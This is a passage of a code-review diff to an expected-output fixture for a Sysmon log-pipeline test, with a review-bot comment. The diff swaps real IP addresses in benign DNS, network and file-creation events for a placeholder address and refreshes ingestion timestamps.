Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 
(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", 
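Review bot: The `event.ingested` rewrite in this hunk is regeneration churn unrelated to the IP change, and the hunks from `@@ -10824,7 +10706,7 @@` through `@@ -11238,7 +11120,7 @@` change nothing else; the value is assigned at index time and will differ on every run, so each regeneration touches every event. If the elastic-package release in use supports it, declaring the field dynamic in the pipeline test config, e.g. `dynamic_fields:` followed by `  event.ingested: ".*"` (constructed example), limits future fixture diffs to meaningful differences and makes review of generated expected files like this one tractable. The `network.community_id` update in `@@ -10750,7 +10632,7 @@` is consistent with the new destination address and is presumably the only other derived value affected, but that could not be confirmed from this page.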
@@ -10741,7 +10623,7 @@ }, "destination": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -10750,7 +10632,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:r3C/WjbATNIislTQ0M+ySzwnuiw=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" 
@@ -10765,13 +10647,13 @@ ], "ip": [ "10.0.2.15", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741794800Z", + "ingested": "2021-12-09T13:50:23.457192300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -10824,7 +10706,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741803400Z", + "ingested": "2021-12-09T13:50:23.457198Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.354274600Z'/\u003e\u003cEventRecordID\u003e24\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.350\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccc6-5c8f-0000-001005082900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4832\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -10875,7 +10757,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741812100Z", + "ingested": "2021-12-09T13:50:23.457203800Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.364042800Z'/\u003e\u003cEventRecordID\u003e25\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.364\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cccc-5c8f-0000-0010e8272900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3208\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -10936,7 +10818,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741820600Z", + "ingested": "2021-12-09T13:50:23.457210Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.402119100Z'/\u003e\u003cEventRecordID\u003e26\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\fe823684-c940-49f2-a940-14b02cbafba9.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -10997,7 +10879,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741829Z", + "ingested": "2021-12-09T13:50:23.457215900Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e27\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\162d4140-cfab-4d05-9c92-bca60515a622.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11058,7 +10940,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741837600Z", + "ingested": "2021-12-09T13:50:23.457221600Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e28\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\1450fedf-ac4c-4e35-b371-ed5d3bbe4776.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.028\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11119,7 +11001,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741846Z", + "ingested": "2021-12-09T13:50:23.457227300Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e29\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\37ed32e9-3c5f-4663-8457-c70743e9456d.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:51:54.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11177,7 +11059,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741858100Z", + "ingested": "2021-12-09T13:50:23.457233400Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e30\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccab-5c8f-0000-001064eb2700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2680\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11238,7 +11120,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741867400Z", + "ingested": "2021-12-09T13:50:23.457239600Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e31\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\nmmhkkegccagdldgiimedpiccmgmieda\\def\\ecb9c915-c4c2-4600-a920-f2bc302990a8.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:08.496\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -11306,12 +11188,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { 
@@ -11328,13 +11210,13 @@ "dsum.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741875900Z", + "ingested": "2021-12-09T13:50:23.457245400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11398,23 +11280,23 @@ "type": "CNAME" }, { - "data": "216.200.232.235", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "74.121.138.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { 
